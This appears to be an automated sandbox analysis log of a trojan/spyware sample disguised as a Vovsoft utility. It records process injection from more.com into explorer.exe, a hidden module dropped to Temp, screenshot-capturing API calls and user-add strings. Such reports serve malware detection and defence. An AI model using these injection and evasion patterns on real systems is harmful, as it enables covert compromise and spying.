            Source: pTvHtQDXio.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
            Source: pTvHtQDXio.exe, 00000000.00000002.1462371507.0000000004E23000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000002.00000002.1576492961.000000000511C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3894917972.0000000005304000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
            Source: pTvHtQDXio.exe, 00000000.00000002.1462371507.0000000004E23000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000002.00000002.1576492961.000000000511C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3894917972.0000000005304000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
            Source: pTvHtQDXio.exeString found in binary or memory: http://ocsp.digicert.com0
            Source: pTvHtQDXio.exeString found in binary or memory: http://ocsp.digicert.com0A
            Source: pTvHtQDXio.exeString found in binary or memory: http://ocsp.digicert.com0C
            Source: pTvHtQDXio.exe, 00000000.00000002.1462371507.0000000004E23000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000002.00000002.1576492961.000000000511C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3894917972.0000000005304000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0L
            Source: pTvHtQDXio.exe, 00000000.00000002.1462371507.0000000004E23000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000002.00000002.1576492961.000000000511C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3894917972.0000000005304000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
            Source: pTvHtQDXio.exeString found in binary or memory: http://ocsp.digicert.com0X
            Source: pTvHtQDXio.exe, 00000000.00000002.1462371507.0000000004E23000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000002.00000002.1576492961.000000000511C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3894917972.0000000005304000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
            Source: pTvHtQDXio.exe, 00000000.00000002.1462371507.0000000004E23000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000002.00000002.1576492961.000000000511C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3894917972.0000000005304000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s2.symcb.com0
            Source: pTvHtQDXio.exe, 00000000.00000002.1462371507.0000000004E23000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000002.00000002.1576492961.000000000511C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3894917972.0000000005304000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crl0a
            Source: pTvHtQDXio.exe, 00000000.00000002.1462371507.0000000004E23000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000002.00000002.1576492961.000000000511C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3894917972.0000000005304000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crt0
            Source: pTvHtQDXio.exe, 00000000.00000002.1462371507.0000000004E23000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000002.00000002.1576492961.000000000511C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3894917972.0000000005304000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcd.com0&
            Source: pTvHtQDXio.exeString found in binary or memory: http://vovsoft.com
            Source: pTvHtQDXio.exeString found in binary or memory: http://vovsoft.com/
            Source: pTvHtQDXio.exeString found in binary or memory: http://vovsoft.com/blog/how-to-activate-using-license-key/openU
            Source: pTvHtQDXio.exeString found in binary or memory: http://vovsoft.com/blog/how-to-uninstall-vovsoft-software/openU
            Source: pTvHtQDXio.exeString found in binary or memory: http://vovsoft.com/help/
            Source: pTvHtQDXio.exeString found in binary or memory: http://vovsoft.com/openU
            Source: pTvHtQDXio.exeString found in binary or memory: http://vovsoft.comopenS
            Source: pTvHtQDXio.exeString found in binary or memory: http://vovsoft.comopenU
            Source: pTvHtQDXio.exeString found in binary or memory: http://www.aiim.org/pdfa/ns/id/
            Source: pTvHtQDXio.exeString found in binary or memory: http://www.color.org
            Source: pTvHtQDXio.exeString found in binary or memory: http://www.digicert.com/CPS0
            Source: pTvHtQDXio.exe, 00000000.00000002.1462371507.0000000004E23000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000002.00000002.1576492961.000000000511C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3894917972.0000000005304000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
            Source: pTvHtQDXio.exeString found in binary or memory: http://www.indyproject.org/
            Source: pTvHtQDXio.exe, 00000000.00000002.1462371507.0000000004DA1000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000002.00000002.1576492961.00000000050D4000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3894917972.00000000052BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.info-zip.org/
            Source: pTvHtQDXio.exe, 00000000.00000002.1462371507.0000000004E23000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000002.00000002.1576492961.000000000511C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3894917972.0000000005304000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/cps0(
            Source: pTvHtQDXio.exe, 00000000.00000002.1462371507.0000000004E23000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000002.00000002.1576492961.000000000511C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3894917972.0000000005304000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/rpa00
            Source: pTvHtQDXio.exe, 00000000.00000002.1462371507.0000000004E23000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000002.00000002.1576492961.000000000511C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3894917972.0000000005304000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0
            Source: pTvHtQDXio.exe, 00000000.00000002.1462371507.0000000004E23000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000002.00000002.1576492961.000000000511C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3894917972.0000000005304000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0/
            Source: pTvHtQDXio.exe, 00000000.00000002.1462371507.0000000004E23000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000002.00000002.1576492961.000000000511C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3894917972.0000000005304000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
            Source: pTvHtQDXio.exe, 00000000.00000002.1462371507.0000000004E23000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000002.00000002.1576492961.000000000511C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3894917972.0000000005304000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
            Source: pTvHtQDXio.exeString found in binary or memory: https://vovsoft.com/blog/credits-and-acknowledgements/open
            Source: pTvHtQDXio.exeString found in binary or memory: https://vovsoft.com/php/ocr_download.php?lang=
            Source: pTvHtQDXio.exeString found in binary or memory: https://vovsoft.com/translation/
            Source: pTvHtQDXio.exeString found in binary or memory: https://vovsoft.com/translation/openU
            Source: pTvHtQDXio.exe, 00000000.00000002.1462371507.0000000004E23000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000002.00000002.1576492961.000000000511C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3894917972.0000000005304000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
            Source: pTvHtQDXio.exeString found in binary or memory: https://www.google.com/search?q=openSV
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_032061F0 Sleep,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegQueryInfoKeyW,RegEnumValueA,RegCloseKey,GdiplusStartup,GetDC,RegGetValueA,RegGetValueA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,RegGetValueA,GetSystemMetrics,GetSystemMetrics,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,GdipDisposeImage,GdiplusShutdown,GetUserNameA,LookupAccountNameA,GetSidIdentifierAuthority,GetSidSubAuthorityCount,GetSidSubAuthority,GetSidSubAuthority,10_2_032061F0
            Source: C:\Users\user\Desktop\pTvHtQDXio.exeCode function: 0_2_0076A6D5 NtQuerySystemInformation,0_2_0076A6D5
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_032061F010_2_032061F0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_0320B70010_2_0320B700
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_0324434710_2_03244347
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_032460F410_2_032460F4
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_0323C9DD10_2_0323C9DD
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_03232F2010_2_03232F20
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_03204EF010_2_03204EF0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_0323D16910_2_0323D169
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_032051A010_2_032051A0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_0322B7C010_2_0322B7C0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_0320545010_2_03205450
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_03241BD710_2_03241BD7
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_0322F9DB10_2_0322F9DB
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_03245FD410_2_03245FD4
            Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 0322A870 appears 56 times
            Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 032061F0 appears 38 times
            Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 03223340 appears 60 times
            Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 0322A021 appears 60 times
            Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 03224250 appears 136 times
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7580 -s 640
            Source: pTvHtQDXio.exeStatic PE information: invalid certificate
            Source: pTvHtQDXio.exeStatic PE information: Number of sections : 11 > 10
            Source: pTvHtQDXio.exe, 00000000.00000002.1448232703.0000000002B38000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekernel32j% vs pTvHtQDXio.exe
            Source: pTvHtQDXio.exe, 00000000.00000002.1453192360.0000000003A2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs pTvHtQDXio.exe
            Source: pTvHtQDXio.exe, 00000000.00000002.1453192360.0000000003A2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs pTvHtQDXio.exe
            Source: pTvHtQDXio.exe, 00000000.00000002.1453192360.0000000003A2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \OriginalFileName vs pTvHtQDXio.exe
            Source: pTvHtQDXio.exe, 00000000.00000002.1463469502.000000000548D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs pTvHtQDXio.exe
            Source: pTvHtQDXio.exe, 00000000.00000000.1435452182.0000000000C11000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameCitizenMP.exe* vs pTvHtQDXio.exe
            Source: pTvHtQDXio.exe, 00000000.00000000.1434379917.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename vs pTvHtQDXio.exe
            Source: pTvHtQDXio.exe, 00000000.00000000.1434379917.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs pTvHtQDXio.exe
            Source: pTvHtQDXio.exe, 00000000.00000000.1434379917.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: \OriginalFileName vs pTvHtQDXio.exe
            Source: pTvHtQDXio.exe, 00000000.00000002.1460844166.0000000004C76000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs pTvHtQDXio.exe
            Source: pTvHtQDXio.exe, 00000000.00000002.1462371507.0000000004E23000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamezip.exe( vs pTvHtQDXio.exe
            Source: pTvHtQDXio.exeBinary or memory string: OriginalFilename vs pTvHtQDXio.exe
            Source: pTvHtQDXio.exeBinary or memory string: OriginalFileName vs pTvHtQDXio.exe
            Source: pTvHtQDXio.exeBinary or memory string: \OriginalFileName vs pTvHtQDXio.exe
            Source: pTvHtQDXio.exeBinary or memory string: OriginalFilenameCitizenMP.exe* vs pTvHtQDXio.exe
            Source: pTvHtQDXio.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@8/7@0/1
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_0320E8D0 GetUserNameA,CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,CoUninitialize,10_2_0320E8D0
            Source: C:\Windows\SysWOW64\more.comFile created: C:\Users\user\AppData\Roaming\ancarJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7580
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8140:120:WilError_03
            Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\20c6f4a26c13cb3c260c246fe6c1910d
            Source: C:\Users\user\Desktop\pTvHtQDXio.exeFile created: C:\Users\user\AppData\Local\Temp\7964f6aeJump to behavior
            Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
            Source: C:\Users\user\Desktop\pTvHtQDXio.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Desktop\pTvHtQDXio.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Desktop\pTvHtQDXio.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: pTvHtQDXio.exeReversingLabs: Detection: 50%
            Source: explorer.exeString found in binary or memory: " /add
            Source: explorer.exeString found in binary or memory: " /add /y
            Source: pTvHtQDXio.exeString found in binary or memory: NATS-SEFI-ADD
            Source: pTvHtQDXio.exeString found in binary or memory: NATS-DANO-ADD
            Source: pTvHtQDXio.exeString found in binary or memory: JIS_C6229-1984-b-add
            Source: pTvHtQDXio.exeString found in binary or memory: jp-ocr-b-add
            Source: pTvHtQDXio.exeString found in binary or memory: JIS_C6229-1984-hand-add
            Source: pTvHtQDXio.exeString found in binary or memory: jp-ocr-hand-add
            Source: pTvHtQDXio.exeString found in binary or memory: ISO_6937-2-add
            Source: pTvHtQDXio.exeString found in binary or memory: /Add: Unexpected [%] object property in an array
            Source: pTvHtQDXio.exeString found in binary or memory: ;application/vnd.adobe.air-application-installer-package+zip
            Source: pTvHtQDXio.exeString found in binary or memory: application/vnd.groove-help
            Source: pTvHtQDXio.exeString found in binary or memory: "application/x-install-instructions
            Source: C:\Users\user\Desktop\pTvHtQDXio.exeFile read: C:\Users\user\Desktop\pTvHtQDXio.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\pTvHtQDXio.exe "C:\Users\user\Desktop\pTvHtQDXio.exe"
            Source: C:\Users\user\Desktop\pTvHtQDXio.exeProcess created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.com
            Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\ancar\comet.exe C:\Users\user\AppData\Roaming\ancar\comet.exe
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7580 -s 640
            Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
            Source: C:\Users\user\Desktop\pTvHtQDXio.exeProcess created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.comJump to behavior
            Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
            Source: C:\Users\user\Desktop\pTvHtQDXio.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\pTvHtQDXio.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\pTvHtQDXio.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\pTvHtQDXio.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\pTvHtQDXio.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\pTvHtQDXio.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\pTvHtQDXio.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\pTvHtQDXio.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\pTvHtQDXio.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\pTvHtQDXio.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\pTvHtQDXio.exeSection loaded: wtsapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\pTvHtQDXio.exeSection loaded: winsta.dllJump to behavior
            Source: C:\Users\user\Desktop\pTvHtQDXio.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\pTvHtQDXio.exeSection loaded: shdocvw.dllJump to behavior
            Source: C:\Windows\SysWOW64\more.comSection loaded: ulib.dllJump to behavior
            Source: C:\Windows\SysWOW64\more.comSection loaded: fsutilext.dllJump to behavior
            Source: C:\Windows\SysWOW64\more.comSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\more.comSection loaded: bitsproxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\more.comSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\more.comSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\more.comSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\more.comSection loaded: xmllite.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeSection loaded: wtsapi32.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeSection loaded: winsta.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: shdocvw.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\more.comKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{5CE34C0D-0DC9-4C1F-897C-DAA1B78CEE7C}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: pTvHtQDXio.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
            Source: pTvHtQDXio.exeStatic file information: File size 14014536 > 1048576
            Source: pTvHtQDXio.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x556000
            Source: pTvHtQDXio.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x1fa400
            Source: pTvHtQDXio.exeStatic PE information: More than 200 imports for user32.dll
            Source: pTvHtQDXio.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: wntdll.pdbUGP source: pTvHtQDXio.exe, 00000000.00000002.1463469502.0000000005360000.00000004.00000800.00020000.00000000.sdmp, pTvHtQDXio.exe, 00000000.00000002.1460844166.0000000004B53000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000002.00000002.1576734242.0000000005200000.00000004.00001000.00020000.00000000.sdmp, more.com, 00000002.00000002.1576008182.0000000004D71000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3894571477.0000000004F5E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3895341723.00000000053E0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: pTvHtQDXio.exe, 00000000.00000002.1463469502.0000000005360000.00000004.00000800.00020000.00000000.sdmp, pTvHtQDXio.exe, 00000000.00000002.1460844166.0000000004B53000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000002.00000002.1576734242.0000000005200000.00000004.00001000.00020000.00000000.sdmp, more.com, 00000002.00000002.1576008182.0000000004D71000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3894571477.0000000004F5E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3895341723.00000000053E0000.00000004.00001000.00020000.00000000.sdmp
            Source: pTvHtQDXio.exeStatic PE information: section name: .didata
            Source: nlhiojbr.2.drStatic PE information: section name: hcj
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeCode function: 6_2_0019C917 push ds; retf 6_2_0019C941
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeCode function: 6_2_0019CA08 pushfd ; retf 6_2_0019CA09
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeCode function: 6_2_0019CB88 push eax; retf 6_2_0019CB89
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeCode function: 6_2_0019D504 pushad ; ret 6_2_0019D602
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeCode function: 6_2_0019CA58 push esp; retf 6_2_0019CA71
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeCode function: 6_2_0019CB5C pushfd ; retf 6_2_0019CB5D
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeCode function: 6_2_0019C850 push 1C00D749h; retf 6_2_0019C90D
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeCode function: 6_2_0019C948 pushfd ; retf 6_2_0019C979
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeCode function: 6_2_0019C948 pushfd ; retf 6_2_0019C9BD
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeCode function: 6_2_0019CBC8 pushfd ; retf 6_2_0019CBC9
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeCode function: 6_2_0019CB4C pushfd ; retf 6_2_0019CB4D
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeCode function: 6_2_0019CA78 push esp; retf 6_2_0019CA71
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeCode function: 6_2_0019C97B pushfd ; retf 6_2_0019C989
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeCode function: 6_2_0019C87C push 1C00D749h; retf 6_2_0019C90D
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeCode function: 6_2_0019C9F0 push esp; retf 6_2_0019CA05
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeCode function: 6_2_0019C9E8 push esp; retf 0019h6_2_0019C9E9
            Source: C:\Users\user\AppData\Roaming\ancar\comet.exeCode function: 6_2_0019CE6E pushad ; retf 6_2_0019CF13
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_0322A2C1 push ecx; ret 10_2_0322A2D4
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_0322C6F7 push ds; ret 10_2_0322C712
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_032175DF pushad ; iretd 10_2_032175E0
            Source: C:\Windows\SysWOW64\more.comFile created: C:\Users\user\AppData\Local\Temp\nlhiojbrJump to dropped file
            Source: C:\Windows\SysWOW64\more.comFile created: C:\Users\user\AppData\Local\Temp\nlhiojbrJump to dropped file

            Hooking and other Techniques for Hiding and Protection

            barindex
            Found hidden mapped module (file has been removed from disk)
            Source: C:\Windows\SysWOW64\more.comModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\NLHIOJBR
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_032293ED GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,10_2_032293ED
            Source: C:\Users\user\Desktop\pTvHtQDXio.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
